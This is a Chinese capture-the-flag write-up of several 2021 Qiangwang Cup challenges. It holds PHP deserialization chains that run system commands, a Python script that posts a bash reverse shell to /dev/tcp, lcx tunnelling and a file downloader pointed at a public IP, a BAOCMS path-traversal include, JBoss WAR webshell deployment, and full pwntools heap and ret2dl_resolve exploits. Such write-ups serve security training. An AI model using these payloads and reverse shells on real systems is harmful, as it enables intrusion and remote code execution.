2021强网杯部分Wp

阅读量    124738 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

 

队伍:D0g3

Web

pop_master

就是找pop链子

<?php
include "class.php";
// $_GET['argv'];
$a = new RE1OMX();
$b = new i1hP7t();
$c = new zXCCeq();
$d = new mrh3g1();
$e = new ZZdOGI();
$f = new llXb4K();
$g = new YSLwLa();
$h = new pWbYui();
$i = new VRRnow();
$j = new EfGhMk();
$k = new F14Wdc();
$l = new skPn09();
$m = new o4pImn();
$n = new ZzeOOG();
$o = new gI55Lg();
$p = new VADeL8();
$q = new nrpCQU();
$r = new hl3aY9();
$s = new v9hArk();
$t = new YdtcqO();
$u = new TC6gGO();
$a->BygUQrE = $b;
$b->KgBLgdZ = $c;
$c->kHDgV8H = $d;
$d->HGD3u9K = $e;
$e->uDi7BnQ = $f;
$f->FDe36Ig = $g;
$g->evVcu96 = $h;
$h->GUCdYot = $i;
$i->mL2xGAo = $j;
$j->sqrYYeP = $k;
$k->xOYcGSr = $l;
$l->VHYeGXw = $m;
$m->gvYGwaB = $n;
$n->ONuahAZ = $o;
$o->W6uBBDs = $p;
$p->C24Rp7S = $q;
$q->qXmg5Al = $r;
$r->bwsbAbm = $s;
$s->ng7uu1P = $t;
$t->n8xdfBT = $u;
echo serialize($a);
?pop=O:6:"RE1OMX":1:{s:7:"BygUQrE";O:6:"i1hP7t":1:{s:7:"KgBLgdZ";O:6:"zXCCeq":1:{s:7:"kHDgV8H";O:6:"mrh3g1":1:{s:7:"HGD3u9K";O:6:"ZZdOGI":1:{s:7:"uDi7BnQ";O:6:"llXb4K":1:{s:7:"FDe36Ig";O:6:"YSLwLa":1:{s:7:"evVcu96";O:6:"pWbYui":1:{s:7:"GUCdYot";O:6:"VRRnow":1:{s:7:"mL2xGAo";O:6:"EfGhMk":1:{s:7:"sqrYYeP";O:6:"F14Wdc":1:{s:7:"xOYcGSr";O:6:"skPn09":1:{s:7:"VHYeGXw";O:6:"o4pImn":1:{s:7:"gvYGwaB";O:6:"ZzeOOG":1:{s:7:"ONuahAZ";O:6:"gI55Lg":1:{s:7:"W6uBBDs";O:6:"VADeL8":1:{s:7:"C24Rp7S";O:6:"nrpCQU":1:{s:7:"qXmg5Al";O:6:"hl3aY9":1:{s:7:"bwsbAbm";O:6:"v9hArk":1:{s:7:"ng7uu1P";O:6:"YdtcqO":1:{s:7:"n8xdfBT";O:6:"TC6gGO":1:{s:7:"Pxqk6ZO";N;}}}}}}}}}}}}}}}}}}}}}&argv=echo 1;?><?php system('cat /flag');?>

[强网先锋]赌徒

源代码

<?php
error_reporting(1);
class Start
{
    public $name='guest';
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';

    public function __construct(){
        echo "I think you need /etc/hint . Before this you need to see the source code";
    }

    public function _sayhello(){
        echo $this->name;//new Info()
        return 'ok';
    }

    public function __wakeup(){
        echo "hi";
        $this->_sayhello();
    }
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}

class Info
{
    private $phonenumber=123123;
    public $promise='I do';

    public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }

    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];//new Room();
    }
}

class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';

    public function __get($name){
        $function = $this->a;//new Room() 
        return $function();
    }

    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }

    public function __invoke(){//当脚本尝试将对象调用为函数时触发
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}

if(isset($_GET['hello'])){
    unserialize($_GET['hello']);
}
?>

exp.php

<?php
class Start{}
class Info{}
class Room{
    public function __construct(){
        $this->filename = "/flag";
    }
}
$a = new Start();
$b = new Info();
$c = new Room();
$c->a = new Room();
$b->file['filename'] = $c;
$a->name = $b;
echo serialize($a);
?>

[强网先锋]寻宝

第二个key开了windows的预览直接搜就搜到了

Hard_Penetration

通过shiro打反弹shell.

获得端口

<?php
$url = 'http://127.0.0.1:8005/';
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$contents = curl_exec($ch);
curl_close($ch);
echo $contents;
?>

echo PD9waHAKJHVybCA9ICdodHRwOi8vMTI3LjAuMC4xOjgwMDUvaW5kZXgucGhwJzsKJGNoID0gY3VybF9pbml0KCk7CiR0aW1lb3V0ID0gNTsKY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgJHRpbWVvdXQpOwokY29udGVudHMgPSBjdXJsX2V4ZWMoJGNoKTsKY3VybF9jbG9zZSgkY2gpOwplY2hvICRjb250ZW50czsKPz4=|base64 -d > test.php
<?php
set_time_limit (24 * 60 * 60);
$url="http://1.116.136.120/".urlencode(iconv("GB2312","UTF-8","lcx.c"));
echo $url."<br>";
$newfname = iconv("UTF-8","GB2312",urldecode(basename($url)));
echo $newfname;
$file = fopen ($url, "rb");
if ($file) {
    $newf = fopen ($newfname, "wb");
    if ($newf)
    while(!feof($file)) {
        fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
    }
}
if ($file) {
    fclose($file);
}
if ($newf) {
    fclose($newf);
}
?>  
   echo PD9waHAKc2V0X3RpbWVfbGltaXQgKDI0ICogNjAgKiA2MCk7CiR1cmw9Imh0dHA6Ly8xLjExNi4xMzYuMTIwLyIudXJsZW5jb2RlKGljb252KCJHQjIzMTIiLCJVVEYtOCIsImxjeC5jIikpOwplY2hvICR1cmwuIjxicj4iOwokbmV3Zm5hbWUgPSBpY29udigiVVRGLTgiLCJHQjIzMTIiLHVybGRlY29kZShiYXNlbmFtZSgkdXJsKSkpOwplY2hvICRuZXdmbmFtZTsKJGZpbGUgPSBmb3BlbiAoJHVybCwgInJiIik7CmlmICgkZmlsZSkgewoJJG5ld2YgPSBmb3BlbiAoJG5ld2ZuYW1lLCAid2IiKTsKCWlmICgkbmV3ZikKCXdoaWxlKCFmZW9mKCRmaWxlKSkgewoJCWZ3cml0ZSgkbmV3ZiwgZnJlYWQoJGZpbGUsIDEwMjQgKiA4ICksIDEwMjQgKiA4ICk7Cgl9Cn0KaWYgKCRmaWxlKSB7CglmY2xvc2UoJGZpbGUpOwp9CmlmICgkbmV3ZikgewoJZmNsb3NlKCRuZXdmKTsKfQo/Pg==|base64 -d > lcx.php

gcc lcx.c -o lcx

靶机: ./lcx -m 3 -h1 1.116.136.120 -h2 127.0.0.1 -p1 81 -p2 8006
vps:./lcx -m 2 -p1 2333 -p2 8005

发现进行查看页面,发现是BAOCMS,直接github找源代码。然后seary代码审计。发现任意文件包含。

然后利用思路我们可以写入脚本在tmp目录下(构造好文件名)然后进行目录穿越来文件包含。

<?php system('cat /flag');?>
echo "PD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTs/Pg=="|base64 -d > /tmp/exp.barcode.php

直接
http://127.0.0.1:8005/Tudou/Lib/barcodegen/html/image.php?code=../../../../../../../../../../../../../../tmp/exp&t=1&r=1&rot=1&text=1&f1=1&f2=1&o=1&dpi=1&a1=1&a2=1
<?php
$url = 'http://127.0.0.1:8005/Tudou/Lib/barcodegen/html/image.php?code=../../../../../../../../../../../../../../tmp/exp&t=1&r=1&rot=1&text=1&f1=1&f2=1&o=1&dpi=1&a1=1&a2=1';
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$contents = curl_exec($ch);
curl_close($ch);
echo $contents;
?>

    echo PD9waHAKJHVybCA9ICdodHRwOi8vMTI3LjAuMC4xOjgwMDUvVHVkb3UvTGliL2JhcmNvZGVnZW4vaHRtbC9pbWFnZS5waHA/Y29kZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi90bXAvZXhwJnQ9MSZyPTEmcm90PTEmdGV4dD0xJmYxPTEmZjI9MSZvPTEmZHBpPTEmYTE9MSZhMj0xJzsKJGNoID0gY3VybF9pbml0KCk7CiR0aW1lb3V0ID0gNTsKY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgJHRpbWVvdXQpOwokY29udGVudHMgPSBjdXJsX2V4ZWMoJGNoKTsKY3VybF9jbG9zZSgkY2gpOwplY2hvICRjb250ZW50czsKPz4=|base64 -d > exp.php

EasyWeb

然后访问files

扫端口发现一个后台http://47.104.137.239:36842/,登录的地方没啥过滤直接报错注入。

登进去后台扫目录发现有个file的路由能传文件,被easyssrf给搞错方向了。

写了一个马,然后直接蚁剑弹shell

netstat查看进程发现8006端口是开放的。

curl一下发现是jboss

然后各种代理挂出来都行,我这里直接公网上面起了个msf然后portfd给转发出来了。

然后后台getshell就是部署war包了,哥斯拉生成一个马,然后打包成压缩包

然后在我的云服务器上起一个pythonserver

此时包已经部署上去了。

马也写上去了。

连上去直接cat

WhereIsUWebShell

<!-- You may need to know what is in e2a7106f1cc8bb1e1318df70aa0a3540.php-->
<?php
ini_set('display_errors', 'on');
if(!isset($_COOKIE['ctfer'])){
    setcookie("ctfer",serialize("ctfer"),time()+3600);
}else{
    include "function.php";
    echo "I see your Cookie<br>";
    $res = unserialize($_COOKIE['ctfer']);
    if(preg_match('/myclass/i',serialize($res))){
        throw new Exception("Error: Class 'myclass' not found ");
    }
}
<?php
// myclass.php
class Hello{
    public function __destruct()
    {   if($this->qwb) echo file_get_contents($this->qwb);
    }
}
?>
<?php
// function.php
function __autoload($classname){//__autoload(),尝试加载未定义的类
    require_once "/var/www/html/$classname.php";
}
?>

我们反序列化去触发__autoload的魔法方法去加载myclass.php,然后在销毁的时候触发__destruct去读文件

<?php
class Hello{
    public $qwb = "e2a7106f1cc8bb1e1318df70aa0a3540.php";
}
class myclass{
}
$a = new myclass();
$b = new Hello();
$a->exp=$b;
$a = serialize($a);
$a = str_replace('"myclass":1','"myclass":2',$a);
echo ($a)."\n";
echo urlencode($a)."\n";

然后读到全部的php代码。

然后思路就是上传临时文件,并且网站目录存在passwd,然后直接利用php://filter/string.strip_tags/resource=passwd造成空指针,浏览器异常。这样可以保存临时文件,然后在进行包含getshell.还有一个问题是照片木马。照片木马可以通过上次国赛在网上找的exp,直接打。

这里简单的说一下为什么要包含固定的照片格式。因为我们包含的文件在tmp下会进行png函数处理,在处理的过程会有数据失去,然后在将处理后的数据给写到$file。

然后写脚本。

# /usr/bin/python3
# @Author:Firebasky
# coding:utf-8
import requests
import re

url = "http://eci-2ze3rbnvegbbrt90dzvx.cloudeci1.ichunqiu.com/e2a7106f1cc8bb1e1318df70aa0a3540.php?"

files = {
  'file': open("exp","rb+").read()
}
response1 = requests.post(url=url+"d5e9d6b6-33ed-4617-be5a-631bc491cff2=php://filter/string.strip_tags/resource=passwd",files=files)

response2 = requests.get(url=url+"29e845c5-7ed5-43ca-a1e7-7dd39e67e722=../../../../../../../../../../tmp")

a = re.findall("\[\d\] => php(.*)", response2.text)[0]#获得上传的临时文件
data = {
  '1':'bash -c "bash -i >& /dev/tcp/ip/port  0>&1"'
    # /usr/bin/ed471efd0577be6357bb94d6R3@dF1aG /l1b/84d74210/07a4c79a/698f57d6/23b08db3/a3d0683d/Fl444gggbc304131
}
response3 = requests.post(url=url+"0=system&d5e9d6b6-33ed-4617-be5a-631bc491cff2=../../../../../tmp/php"+a,data=data)

然后直接执行命令反弹shell,吐槽 flag非常难找。。。。。。。。。。。。。。。。。。。

最后命令:/usr/bin/ed471efd0577be6357bb94d6R3@dF1aG /l1b/84d74210/07a4c79a/698f57d6/23b08db3/a3d0683d/Fl444gggbc304131

 

Re

ezmath

程序中应该故意给了错误数据,,

开始还写了一个ida动调脚本从0x2021跑到0x7f7f爆破,结果一个解都找不到。。。

虽然这题这样解不出来,还是贴一下写的动调的脚本吧(要修改原程序),,,

from ida_dbg import *
from ida_bytes import *

def init():
    probase=FirstSeg()
    breakpoint1=0x14D5+probase
    rbp = get_reg_val("rbp")
    set_reg_val("rip", breakpoint1)
    patch_qword(rbp-0x44, 0)

i = 0x2021

while(True):
    print(">>> i: %d"%i) 
    run_to(0x14F1+FirstSeg())
    wait_for_next_event(WFNE_SUSP, -1)
    set_reg_val("edi", i)
    run_to(0x153B+FirstSeg())
    wait_for_next_event(WFNE_SUSP, -1)
    rax = get_reg_val("rax")
    if rax != 1:   
        i += 1
        init()
    else:
        print(">>> find: %d"%i)
        break
exit_process()

然后分析程序,这其实是个数学题。。

程序在init用积分算了一个新的值改变了硬编码的0.2021,但这个新改的数据应该也是错的。。

image-20210614012602802

求积分,公式推导。。

精度太高,我是穷举(0x2021-0x7f7f)来找最接近密文的值,这就多次复用了通过递推算出的积分。那就先统一算完写入文件。在读文件使用。

数据太多了,部分值:

0.000330409855750
0.000330369698985
0.000330329551981
0.000330289414732
0.000330249287236
0.000330209169490
0.000330169061489
0.000330128963230
0.000330088874709
0.000330048795924
0.000330008726870
0.000329968667544
0.000329928617942
0.000329888578061
0.000329848547897

读数据文件,穷举找最接近的值。

#include<stdio.h>
#include<stdlib.h>
#include<math.h>

double enc[] = {0.00009794904266317233, 0.00010270456917442, 0.00009194256152777895,0.0001090322021913372, 0.0001112636336217534, 0.0001007442677411854,0.0001112636336217534, 0.0001047063607908828, 0.0001112818534005219,0.0001046861985862495, 0.0001112818534005219, 0.000108992856167966,0.0001112636336217534, 0.0001090234561758122, 0.0001113183108652088,0.0001006882924839248, 0.0001112590796092291, 0.0001089841164633298, 0.00008468431512187874};

double minValue = 100.0;
int min_index;
char flag[100];
double data[0x7f7f-0x2021+1];    

int main(void)
{
    int i, j;
    FILE *fp;

    fp = fopen("data1", "rb");
    for(i = 0x2021; i < 0x7f7f; i++)
    {
        fread(data+i-0x2021, sizeof(double), 1, fp);
        //printf("%.15lf\n", data[i-0x2021]);
    }
    fclose(fp);

    for (i = 0; i < 19; i++)
    {
        minValue = 100.0;
        for(j = 0x2021; j < 0x7f7f; j++)
        {
            double ans = data[j-0x2021];
            double ppp = ans>enc[i] ? ans-enc[i]:enc[i]-ans;
            if(ppp < minValue)
            {    
                minValue = ppp;
                min_index = j;
                //printf("%x: %.15lf, min_index:%x\n", j, minValue, min_index);
            }
        } 
        //printf("%.15lf\n", minValue);
        flag[i*2] = min_index & 0xff;
        flag[i*2 + 1] = (min_index >> 8)&0xff;    
    }

    puts(flag);

    return 0;    
}

LongTimeAgo

计算len

sub_401DB0函数每8个一组进行bytes_to_long操作,且输入字符要为大写。

生成key和加密,加密函数为两种类型,xtea和tea,和异或操作。

如tea:

先异或解密得到(0xfd 0x1fd 0x3fd 0x7fd):

0x1f30678f, 0xb75b0dd4, 0x4a7cdb1e, 0x2877bc22, 0x1354c778, 0x357c3bc7, 0x738af391, 0x89b7f2ca

然后解密都稍微魔改了下的tea和xtea,动调从内存中找delat。

懒了,直接找网上的改下:

#include <stdio.h>
#include <stdint.h> 

void decrypt1(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4])
{  
    unsigned int i;  
    uint32_t v0 = v[0], v1 = v[1], delta = 0x70C88617, sum = 0xE6EF3D20;  
    for(i = 0; i < num_rounds; i++)
    {  
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum>>11) & 3]);  
        sum += delta;  
        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);  
    }  
    v[0]=v0, v[1]=v1;  
}

void decrypt2(uint32_t* v, uint32_t* k)
{  
    uint32_t v0 = v[0], v1 = v[1], sum = 0xa6a53780, i;  
    uint32_t delta = 0x3D3529BC;                      
    uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];  
    for (i=0; i<32; i++)
    {                         
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);  
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);  
        sum -= delta;  
    }                                             
    v[0]=v0, v[1]=v1;  
} 

int main(void)
{
    uint32_t v[2]={0x1f30678f,0xb75b0dd4};
    uint32_t const k[4]={0xfffd,0x1fffd,0x3fffd,0x7fffd};
    unsigned int r=32;
    decrypt1(r, v, k);
    //decrypt2(v, k)
    printf("解密后的数据:%x %x\n",v[0],v[1]);

    return 0;  
}

最后注意解密的数据要大写,,,看了好久。。

StandOnTheGiants

关键就在native层的一个check函数。

一个rsa加密,有n和e,解还好,关键就是最后的换表base64有多个对应(+-有2个),这就有2^14种情况了。我还真就写了14个for循环,,,

最后爆出flag

import gmpy2
import base64
import copy
from Crypto.Util import number

base = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;?@+-"
enc = "bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO/PvDOIivNYtvJ?Mi*GG+/lmqEysrTdSD+eP+moP+l?+Np/oK="
ans = []
for i in enc:
    if i != '=':
        ans += [base.index(i)]

jia_ = [53, 62]
jian_ = [55, 63]
jia = []
jian = []
for i,s in enumerate(enc):
    if s == '+':
        jia += [i]
    if s == '-':
        jian += [i]


jia_ = [53, 62]
jian_ = [55, 63]
qqqq = 0
ans22 = [0]*14
ans_ = [[0]]
for a in range(2):
    ans22[0] = jia_[a]
    for b in range(2):
        ans22[1] = jia_[b] 
        for c in range(2):
            ans22[2] = jia_[c]
            for d in range(2):
                ans22[3] = jia_[d]
                for e in range(2):
                    ans22[4] = jia_[e]
                    for f in range(2):
                        ans22[5] = jia_[f]
                        for g in range(2):
                            ans22[6] = jia_[g]
                            for h in range(2):
                                ans22[7] = jia_[h]
                                for i in range(2):
                                    ans22[8] = jia_[i]
                                    for j in range(2):
                                        ans22[9] = jia_[j]
                                        for k in range(2):
                                            ans22[10] = jian_[k]
                                            for l in range(2):
                                                ans22[11] = jian_[l]
                                                for m in range(2):
                                                    ans22[12] = jian_[m]
                                                    for n in range(2):
                                                        ans22[13] = jian_[n]
                                                           asd = copy.deepcopy(ans22)
                                                           ans_ += [asd]

p = 33372027594978156556226010605355114227940760344767554666784520987023841729210037080257448673296881877565718986258036932062711
q = 64135289477071580278790190170577389084825014742943447208116859632024532344630238623598752668347708737661925585694639798853367
e =  0x10001


#print(ans_[1])
for i in range(2**14):
    for j in range(10):
        ans[jia[j]] = ans_[i+1][j]
    for j in range(4):
        ans[jian[j]] = ans_[i+1][10+j]

    sss = ''.join(['{:0>6}'.format(bin(o)[2:]) for o in ans])
    flag = []
    for s in range(len(sss)//8):
        flag += [int(sss[8*s:8*(s+1)], 2)]

    flag = bytes(flag)
    #print(flag)
    #c = int(flag.hex(),16)
    c = number.bytes_to_long(flag)
    #print(number.bytes_to_long(flag))
    #print(c)
    n = q*p
    phi = (q-1) * (p-1)
    d = gmpy2.invert(e, phi)
    m = gmpy2.powmod(c, d, n)
    www = number.long_to_bytes(m)
    if b'flag' in www:
        print(www)

 

Pwn

baby_diary

漏洞点

__int64 __fastcall sub_132B(__int64 a1, int a2, char a3)
{
  int i; // [rsp+1Ch] [rbp-4h]

  for ( i = 0; i < a2; ++i )
  {
    if ( (int)read(0, (void *)(i + a1), 1uLL) <= 0 )
    {
      puts("read error");
      exit(0);
    }
    if ( a3 == *(_BYTE *)(i + a1) )
      break;
  }
  *(_BYTE *)(i + a1) = 0;                      //设置最后一个至为0
  return (unsigned int)i;
}

执行完编辑函数,可以修改最后一个字节的low_byte位

void __fastcall sub_1528(unsigned int idx, int n)
{
  __int64 v2; // [rsp+10h] [rbp-8h]

  if ( idx <= 0x18 && bufs[idx] )
  {
    v2 = bufs[idx];
    flags[idx] = n;
    if ( n )
      *(_BYTE *)(n + 1LL + v2) = (*(_BYTE *)(n + 1LL + v2) & 0xF0) + sub_146E(idx); // n若为开辟内存大小的话,存在溢出, 修改低4位
  }
}

然而sub_146E函数根据下面算法计算的,若大于0x0f的话,就不能构造结果为0,这有点坑。

__int64 __fastcall sub_146E(unsigned int a1)
{
  int i; // [rsp+10h] [rbp-14h]
  unsigned int v3; // [rsp+14h] [rbp-10h]

  if ( a1 > 0x18 || !bufs[a1] )
    return 0xFFFFFFFFLL;
  v3 = 0;
  for ( i = 0; i < flags[a1]; ++i )
    v3 += *(unsigned __int8 *)(i + bufs[a1]);
  while ( v3 > 0xF )
    v3 = (v3 >> 4) + (v3 & 0xF);
  return v3;
}

漏洞综述,程序有点恶心,最后字节用’\x00’截断,4bit位溢出。

glibc 2.31下绕过unlink,稍微有点难构造,加上本身程序逻辑,更难构造了,各种层层构造关联太强了,但最后还是找的了某些地址,成功构造利用链子,这需要控制很好的地址的值,比如实现unlink时,prev_size 要满足 0x100的倍数,不然不好设置我们unlink chunk size低3位为 0,还有构造unlink的fd->bk 指向自己本身,bk->fd指向自己本身,然而程序有点烦人的是最后一字节为’\x00’截断的,后面有4bit位溢出,这使得我们伪造chunk的fd必需要为0x100的整数倍才行。实现unlink之后就实现了堆重叠,泄漏Libc然后再修改__free_hook为system函数,至于glibc 2.31下如何绕过unlink,它与2.29一样的,多了个 prev_size == chunk_size的检查,这就比较麻烦, 可以参考这篇博客:https://bbs.pediy.com/thread-257901-1.htm

下面是我重重构造,实现unlink的信息

 0x5555dc297300 —▸ 0x5555dc297dd0 —▸ 0x7f8e6ac39ca0 (main_arena+96) ◂— 0x5555dc29730

exp

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
# Author: i0gan
# ref: https://bbs.pediy.com/thread-257901-1.htm
from pwn import *
import os
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

elf_path  = './baby_diary'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
#libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
libc_path = './libc.so.6'

# remote server ip and port
host = "8.140.114.72:1399"

# if local debug
LOCAL = 0
LIBC  = 1
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)
def ad(sz, d):
    sla('>>', '1')
    sla(':', str(sz))
    if(sz > 0):
        sa(':', d)

def dp(idx):
    sla('>>', '2')
    sla(':', str(idx))

def rm(idx):
    sla('>>', '3')
    sla(':', str(idx))

#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    for i in range(7): # 0-6
        ad(0x1000, "padding\n")

    #ad(0x1000-0x210 + 0x70 , "padding\n") # 7 glibc 2.29
    ad(0x1000-0x210 + 0x70 -0x40, "padding\n") # 7 glibc 2.31

    for i in range(7): # 8-14
        ad(0x28, 't\n')

    ad(0x1b20, "largebin\n") # 15
    ad(0x20, "padding\n") # 16
    rm(15)

    ad(0x2000, '\n') # 15
    ad(0x28, p64(0) + p64(0x601) + b'\n') # idx:17 get a chunk from largebin

    ad(0x28, 'a\n') # 18
    ad(0x28, 'b\n') # 19
    ad(0x38 + 0x300, 'c\n') # 20
    ad(0x28, 'd\n') # 21
    ad(0x28, 'e\n') # 22 for not merge

    # fill in tcache_entry[1](size: 0x30)
    t = 9
    for i in range(7): # 8-14
        rm(8 + i)
    rm(18) # t
    rm(20)
    rm(21)

    # clear tcache_entry[1](size: 0x30)
    for i in range(7): # 8-14
        ad(0x28, '\n')

    # fastbin to smallbin
    ad(0x450, '\n') #18

    # get a chunk from smallbin , another smallbin chunk to tcache
    # 20, change fake chunk's fd->bk to point to fake chunk
    ad(0x28,  b'\x03' + b'\x00' * 7 + b'\n')

    # clear chunk from tcache
    ad(0x28, 'clear\n') # 21

    for i in range(7): # 8-14
        rm(8 + i)

    # free to fastbin
    rm(19)
    rm(17)

    for i in range(7): # 8-14
        ad(0x28, '\n')

    # change fake chunk's bk->fd
    ad(0x28, b'\n') # 17


    # Make house of einherjar
    rm(18)
    for i in range(6): # 8-14
        rm(8 + i)

    ad(0x170, '\n') # 8
    ad(0x450, '\n') # 9
    ad(0x60, '\n')  # 10

    rm(8)
    ad(0x177, b'\x00' * 0x177) # 8
    rm(8)
    ad(0x177, (b'\x00' * 0x16f) + b'\x06' + b'\n') # 8
    # unlink
    rm(9)

    # leak libc 
    ad(0x430, '\n') # 9
    dp(22) 
    leak = u64(ru('\x7f')[-5:] + b'\x7f\x00\x00')
    libc_base = leak - libc.sym['__malloc_hook'] - 0x10 - 96
    system = libc_base + libc.sym['system']
    free_hook = libc_base + libc.sym['__free_hook']
    li('libc_base: ' + hex(libc_base))
    #ad(0x17, p64(free_hook) + b'\n')

    for i in range(3):
        ad(0x28, b'\n')

    rm(20) # 

    rm(0) # for clean
    rm(1) # for clean

    ad(0x18, '/bin/sh\n')

    rm(9) #
    ad(0x430, b'A' * 0x400 + p64(free_hook) + p64(0) + b'\n') 
    ad(0x28, '\n')
    ad(0x28, p64(system) + b'\n')

    db()
    rm(0)


    # double free
    #rm(0)


    '''
    rm(9)
    ad(0x37, b'\x00' + b'\x00' * 0x30 + b'\x50' + b'\n')
    '''

def finish():
    ia()
    c()
#--------------------------main-----------------------------
if __name__ == '__main__':
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
        io = elf.process()
    else:
        elf = ELF(elf_path)
        io = remote(host.split(':')[0], int(host.split(':')[1]))
        if LIBC:
            libc = ELF(libc_path)
    exploit()
    finish()

noout

没有打印函数,通过’\x00’字节绕过字符串比较

__sighandler_t sub_8049424()
{
  __sighandler_t result; // eax
  char src[32]; // [esp+Ch] [ebp-5Ch] BYREF
  char buf[48]; // [esp+2Ch] [ebp-3Ch] BYREF
  const char *v3; // [esp+5Ch] [ebp-Ch]

  init_();
  v3 = "tell me some thing";
  read(0, buf, 0x30u);
  v3 = "Tell me your name:\n";
  read(0, src, 0x20u);
  sub_80493EC(src);
  strcpy(dest, src);
  v3 = "now give you the flag\n";
  read(unk_804C080, src, 0x10u);
  result = (__sighandler_t)str_cmp(src, off_804C034);// 字符串比较
  if ( !result )
    result = sub_8049269();
  return result;
}

再利用计算错误抛出SIGFPE信号使调用漏洞函数

__sighandler_t sub_8049269()
{
  __sighandler_t result; // eax
  void (*v1)(int); // [esp+0h] [ebp-18h] BYREF
  int v2[2]; // [esp+4h] [ebp-14h] BYREF
  const char *v3; // [esp+Ch] [ebp-Ch]

  v3 = "give me the soul:";
  __isoc99_scanf("%d", v2);
  v3 = "give me the egg:";
  __isoc99_scanf("%d", &v1);
  result = v1;
  if ( v1 )
  {
    signal(8, (__sighandler_t)vuln);            // set handler
                                                // SIGFPE 表示一个算数运算异常
    v2[1] = v2[0] / (int)v1;                    // 使运算异常调用漏洞函数
    result = signal(8, 0);
  }
  return result;
}
ssize_t vuln()
{
  char buf[68]; // [esp+0h] [ebp-48h] BYREF

  return read(0, buf, 0x100u);                  // stack overflow
}

漏洞函数中就是简单的堆栈溢出了,采用dl_runtime_resolve攻击。

exp

#!/usr/bin/env python2
#-*- coding:utf-8 -*-
# Author: i0gan

from pwn import *
from roputils import ROP
import os

# roputils: https://github.com/inaz2/roputils/blob/master/roputils.py
r   =  lambda x : io.recv(x)
ra  =  lambda   : io.recvall()
rl  =  lambda   : io.recvline(keepends = True)
ru  =  lambda x : io.recvuntil(x, drop = True)
s   =  lambda x : io.send(x)
sl  =  lambda x : io.sendline(x)
sa  =  lambda x, y : io.sendafter(x, y)
sla =  lambda x, y : io.sendlineafter(x, y)
ia  =  lambda : io.interactive()
c   =  lambda : io.close()
li    = lambda x : log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')

context.log_level='debug'
context.terminal = ['tmux', 'splitw', '-h']
#context.arch = 'amd64'

elf_path  = './test'
libc_path = '/glibc/2.23/64/lib/libc.so.6'
libc_path = './libc.so.6'

# remote server ip and port
host = "39.105.138.97:1234"

# if local debug
LOCAL = 0
LIBC  = 0
#--------------------------func-----------------------------
def db():
    if(LOCAL):
        gdb.attach(io)

#--------------------------exploit--------------------------
def exploit():
    li('exploit...')
    s('\x00' * 0x30)
    #db()
    # make calc error
    s('\x00' * 0x20)
    sl(str(-0xcccccccc))
    #db()
    sl(str(-1))

    # vuln, stack overflow
    rop  = ROP(elf_path)
    buf  = elf.bss()
    pop3 = 0x08049581
    p = b'\x00' * 0x4C
    p += p32(elf.sym['read'])
    p += p32(pop3)
    p += p32(0)
    p += p32(buf)
    p += p32(0x80)
    p += rop.dl_resolve_call(buf + 0x10, buf, 0, 0) # call, args
    sleep(0.5)
    s(p)

    # dl resolve data 
    p = '/bin/sh\x00'.ljust(0x10, '\x00')
    p += rop.dl_resolve_data(buf + 0x10, 'execve')
    p = p.ljust(0x80, '\x00')
    sleep(1)
    sl(p)

    #sleep(0.1)
    #sl(p)

def finish():
    ia()
    c()
#--------------------------main-----------------------------
